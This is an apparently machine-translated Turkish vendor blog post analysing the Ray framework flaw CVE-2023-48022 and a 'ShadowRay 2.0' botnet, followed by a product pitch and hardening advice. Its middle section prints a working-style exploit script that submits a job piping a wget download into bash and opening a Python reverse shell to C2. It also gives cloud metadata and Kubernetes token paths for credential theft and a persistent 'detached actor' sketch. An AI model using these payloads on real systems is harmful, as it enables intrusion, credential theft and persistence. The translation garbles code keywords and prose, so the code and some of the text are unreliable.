Penligent Başlık

Zombi Güvenlik Açığı: CVE-2023-48022'nin 2026 Otopsisi ve ShadowRay 2.0 Dirilişi

Yıl 2026. YZ endüstrisi, deneysel sohbet robotlarından kritik altyapıyı yöneten otonom ajanlara kadar olgunlaştı. Ancak, dünyanın en gelişmiş YZ şirketlerinin sunucu çiftliklerine ve Kubernetes kümelerine musallat olan geçmişten gelen bir hayalet var: CVE-2023-48022.

İlk olarak 2023 yılının sonlarında açıklanan bu kritik güvenlik açığı (CVSS 9.8) Işın Çerçevesi-OpenAI, Uber ve Amazon tarafından kullanılan dağıtılmış bilgi işlem standardının çözülmüş bir sorun olması gerekiyordu. Ancak, 2025'in sonlarında yaşanan ShadowRay 2.0 botnet aksini kanıtladı. On binlerce GPU kümesi, sadece kripto madenciliği için değil, sofistike veri sızdırma ve dağıtılmış hizmet reddi (DDoS) saldırıları için de sessizce zombi ağlarına dahil edildi.

Seçkin yapay zeka güvenlik mühendisi için CVE-2023-48022 sadece bir hata değil, bir vaka çalışmasıdır. "Tasarımdan Gelen Güvensizlik." YZ geliştirmenin açık araştırma kültürü ile modern internetin düşmanca gerçekliği arasında bir çarpışmayı temsil etmektedir. Bu makale, güvenlik açığının adli bir analizini sunmakta, ShadowRay 2.0'ın evrimleşmiş ticaretini incelemekte ve eski taramanın neden yapay zeka hesaplama alt tabakasını korumada başarısız olduğunu ana hatlarıyla açıklamaktadır.

CVE-2023-48022'nin 2026 Otopsisi ve ShadowRay 2.0 Yeniden Dirilişi

"Zafiyet Olarak Özellik" Mimarisi

CVE-2023-48022'nin neden ölmeyi reddettiğini anlamak için Ray'in felsefesini anlamak gerekir. Ray, güvenilir intranetlerde hız ve kullanım kolaylığı için geliştirilmiştir.

Kusur:

Önemli güçlendirmelerden önceki sürümlerde (ve yanlış yapılandırılmış modern dağıtımlarda) Ray Dashboard ve Jobs API, herhangi bir kimlik doğrulama mekanizması olmadan varsayılan olarak 0.0.0.0:8265 adresine bağlanır.

Ray'in yaratıcıları Anyscale, başlangıçta CVE atamasına itiraz ederek Ray'in katı bir ağ çevresi içinde çalışmasının amaçlandığını savundu. "Sert dış kabuk" savunma modeline olan bu güven, geliştiriciler Ray Dashboard'larını uzaktan izleme için internete açmaya başladığında veya saldırganlar dahili olarak dönmek için Sunucu Tarafı İstek Sahteciliği (SSRF) kullandığında çöktü.

Saldırı Yüzeyinin Yapısını Bozma

Güvenlik açığı, bir saldırgana basit bir HTTP API aracılığıyla Ray kümesi üzerinde tam kontrol sağlar. Bellek bozulması, yarış koşulu ve karmaşık heap feng shui gerekmez.

Saldırı İlkelleri:

  1. Giriş Noktası: Jobs API (/api/jobs/).
  2. Mekanizma: API, kümenin çalışan düğümlerinde çalıştırılmak üzere keyfi Python kodu veya kabuk komutlarının gönderilmesine izin verir.
  3. Ayrıcalık: Ray süreçleri genellikle kök Docker kapsayıcıları içinde veya veri kümeleri içeren S3 kovalarına erişmek için yüksek ayrıcalıklı IAM rolleri ile.

Teknik Tekrar: ShadowRay Öldürme Zinciri

ShadowRay 2.0 aktörleri tarafından kullanılan istismar mantığını yeniden yapılandıralım. Bu basitin ötesine geçer kıvrıl komutlarının kalıcı kontrolü nasıl düzenlediklerini göstermek için.

Aşama 1: Keşif ve Parmak İzi Alma

Saldırganlar özellikle TCP bağlantı noktasını tarar 8265. Sorgulama yaparak hizmetin parmak izini alırlar /api/version veya ayırt edici Ray Dashboard HTML başlığını aramak.

Aşama 2: Silahlandırma (Python İş Teslimi)

Saldırgan, "İş Gönderici" olarak görev yapan bir Python betiği oluşturur. Bu komut dosyası, kötü amaçlı bir görev oluşturmak için hedefin API'si ile etkileşime girer.

Python

`import requests import json import sys

Zombi Güvenlik Açığı: CVE-2023-48022'nin 2026 Otopsisi ve ShadowRay 2.0 Dirilişi

Hedef: Shodan veya SSRF aracılığıyla bulunan açık bir Işın Kümesi

TARGET_IP = "http://target-cluster.ai:8265

def exploit_cluster(target): url = f"{target}/api/jobs/"

# Yük: Çok aşamalı bir bash betiği
# 1. Kalıcılık: Gizli bir cron işi veya systemd hizmeti oluşturun
# 2. Kaçış: Rakip madencileri öldür
# 3. Bağlantı: C2'ye Ters Kabuk
entrypoint_cmd = (
    "wget -qO-  | bash && "
    "export OMP_NUM_THREADS=1 && "
    "python3 -c 'import socket,os,pty;s=socket.socket();...'"
)

payload = {
    "giriş noktası": giriş noktası_cmd,
    "submission_id": "optimization_task_v4", # Sosyal Mühendislik: Yasal bir iş gibi görünün
    "runtime_env": {
        "working_dir": "/tmp",
        "pip": ["requests", "boto3"] # Sızma için ön yükleme araçları
    },
    "metadata": {
        "kullanıcı": "root",
        "Açıklama": "Sistem Sağlık Kontrolü"
    }
}

try:
    print(f"[*] {hedef}'e ödeme yükü gönderiliyor...")
    resp = requests.post(url, json=payload, timeout=10)
    
    if resp.status_code == 200:
        job_id = resp.json().get('job_id')
        print(f"[+] Exploitation Successful. Job ID: {job_id}")
        print(f"[+] Küme artık sizin kontrolünüz altında.")
    else:
        print(f"[-] Başarısız: {resp.status_code} - {resp.text}")
        
except Exception as e:
    print(f"[!] Hata: {e}")

Eğer isim == “ana": exploit_cluster(TARGET_IP)`

3. Aşama: Kimlik Hırsızlığı Yoluyla Yanal Hareket

Kod çalışan düğümde yürütüldüğünde, komut dosyası Örnek Meta Veri Hizmeti (IMDS) bulut kimlik bilgilerini çalmak için.

  • AWS: Sorgu http://169.254.169.254/latest/meta-data/iam/security-credentials/ EC2 rolünün anahtarlarını çalmak için.
  • Kubernetes: Okuyun /var/run/secrets/kubernetes.io/serviceaccount/token.

Yapay zeka eğitim işleri devasa veri kümelerine erişim gerektirdiğinden, bu kimlik bilgileri genellikle S3FullAccess veya eşdeğer izinler, saldırganın tescilli modelleri (milyonlar değerinde) dışarı sızdırmasına veya eğitim verilerini zehirlemesine olanak tanır.

ShadowRay 2.0: Kalıcılığın Evrimi

2025'in sonlarında gözlemlenen "2.0" varyantı yeni bir kalıcılık mekanizması getirmiştir: Müstakil Aktörler.

Ray'de "Aktör" durum bilgisi olan bir işçi işlemidir. Saldırganlar, iş yaşam döngüsünden ayrılmak üzere tasarlanmış kötü niyetli Aktörleri devreye sokarlar. Güvenlik ekibi gösterge tablosunda görülen belirli bir "İşi" öldürse bile, Aktör süreci arka planda canlı kalır, kaynakları tüketir ve C2 bağlantısını sürdürür.

Python

`# Kavramsal Kötü Amaçlı Aktör @ray.remote class ShadowActor: def başlangıç(self): self.c2_connection = setup_c2()

def keep_alive(self):
    doğru iken:
        # Madencilik veya Sızma mantığı
        process_data()
        time.sleep(1)


Bağımsız bir aktör olarak konuşlandırın - iş feshinden kurtulur

aktör = ShadowActor.options(name="system_optimizer", lifetime="detached").remote()`

"Gölge Yapay Zeka" Sorunu ve Tespit Hataları

Pahalı güvenlik duvarlarına sahip kuruluşlar neden hala CVE-2023-48022 tarafından vuruluyor? Cevap şurada yatıyor Gölge Yapay Zeka.

Veri Bilimciler ve Makine Öğrenimi Mühendisleri, deneyler için geçici kümeler oluşturmak üzere genellikle BT kontrollerini atlarlar. GitHub'dan kopyalanan Terraform komut dosyalarını veya Helm çizelgelerini kullanırlar ve hata ayıklama kolaylığı için varsayılan olarak Gösterge Tablosunu açığa çıkarırlar. Bu "Gölge Kümeler" merkezi BT envanterinde ve geleneksel güvenlik açığı tarayıcılarında görünmezdir (bu tarayıcılar 192.168.1.0/24 ancak mühendisler tarafından oluşturulan geçici VPC'leri özlüyor).

Ayrıca, geleneksel tarayıcılar aşağıdakileri kontrol eder yazılım sürümleri. Bir mühendis eski, kararlı bir Docker görüntüsü kullanarak Ray kümesini çalıştırırsa (örn, rayproject/ray:2.8.0) bir makaleyi yeniden üretmek için, anında savunmasızdır.

Yapay Zeka Odaklı Savunma: İhmalkar Yaklaşım

ShadowRay'e karşı savunma, statik bir taramadan daha fazlasını gerektirir; şunları gerektirir di̇nami̇k varlik keşfi̇ ve davranişsal anali̇z.

İşte burası Penligent.ai yapay zeka altyapısı için savunma duruşunu değiştirir.

1. Gölge Mülkün Haritalandırılması

Penligent'in aracıları, sürekli varlık keşfi gerçekleştirmek için Bulut API'leri (AWS, Azure, GCP) ve Kubernetes kümeleri ile entegre olur. Üretim varlıkları olarak etiketlenmemiş olsalar bile "Ray benzeri" davranışlar sergileyen (8265, 10001, 6379 numaralı açık bağlantı noktaları) hesaplama örneklerini tanımlar. Bu, "Gölge Yapay Zeka" yüzeyini aydınlatır.

2. Aktif, Güvenli Doğrulama

Penligent, afiş yakalamaya (sahte olabilir) güvenmek yerine Güvenli Aktif Doğrulama. Jobs API ile iyi huylu bir yük kullanarak etkileşime girmeye çalışır; örneğin, sadece hesaplama yapan bir iş göndermek gibi 1 + 1 veya rastgele bir dizeyi yankılar.

  • Eğer başarılıysa: RCE riskini sıfır yanlış pozitif ile doğrular ve SOC'yi derhal uyarır.
  • Güvenlik: Bir solucanın aksine, Penligent'ın probu sistem durumunu değiştirmez, kalıcılık yüklemez veya veri sızdırmaz.

3. Hesaplama İmzalarında Anormallik Tespiti

Penligent, meşru eğitim iş yükleri için bir temel oluşturur. ShadowRay virüslerinin belirgin bir parmak izi vardır:

  • Şebeke: Madencilik havuzlarına veya bilinmeyen IP'lere (C2) beklenmeyen giden bağlantılar.
  • Hesapla: Zamanlanmış eğitim işleri ile ilişkili olmayan CPU/GPU kullanım artışları.
  • Süreç: Olağandışı kabukların yumurtlaması (/bin/bash, kıvrıl, wget) Ray işçi işlem ağacından.

2026 için Savunma Stratejisi: Bilgi İşlem Alt Tabakasının Güçlendirilmesi

Altyapınızı CVE-2023-48022 ve ardıllarına karşı bağışıklık kazandırmak için bu sert kontrolleri uygulayın:

  1. Sıfır Güven Ağı: Ray Dashboard'u asla halka açık internete maruz bırakmayın. Erişim, güvenli bir Bastion Host, VPN veya Cloudflare Access veya AWS Verified Access gibi bir Identity-Aware Proxy (IAP) aracılığıyla sağlanmalıdır.
  2. Kimlik Doğrulamayı Zorla (Karşılıklı TLS): Ray artık temel kimlik doğrulamasını desteklese de, altın standart mTLS. Ray'i tüm küme içi ve istemci-sunucu iletişimi için istemci sertifikaları gerektirecek şekilde yapılandırın.
  3. Ad Alanı İzolasyonu: Ray kümelerini özel Kubernetes ad alanlarında sıkı bir şekilde çalıştırın AğPolitikaları. Beyaz listedeki S3 kovaları ve model kayıtları (Hugging Face) hariç tüm çıkış trafiğini reddedin. IMDS'ye erişimi engelleyin (169.254.169.254).
  4. Değişmez Altyapı: Saldırganların araçları indirmesini veya disk üzerinde kalıcılık oluşturmasını önlemek için Ray çalışan konteynerleri için salt okunur kök dosya sistemleri kullanın.

Sonuç

CVE-2023-48022 Bu sadece bir güvenlik açığı değil; sektörün güvenlik mimarisi pahasına yapay zekayı benimsemek için acele etmesinin bir belirtisidir. Dağıtık hesaplamaya daha fazla güvendikçe, "Ağ Sınırı" artık yeterli bir savunma değildir.

ShadowRay 2.0 kampanyası, saldırganların aktif olarak bu açık kapıların peşinde olduğunu kanıtlıyor. Güvenlik mühendisleri, bir zombi botnetindeki bir sonraki düğüm haline gelmeden önce bilgi işlem varlıklarını sürekli olarak keşfetmek, test etmek ve güçlendirmek için Penligent gibi yapay zeka odaklı araçlardan yararlanarak "İhlali Varsayalım" zihniyetini benimsemelidir.

Güvenilir Referanslar

Gönderiyi paylaş:
İlgili Yazılar
tr_TRTurkish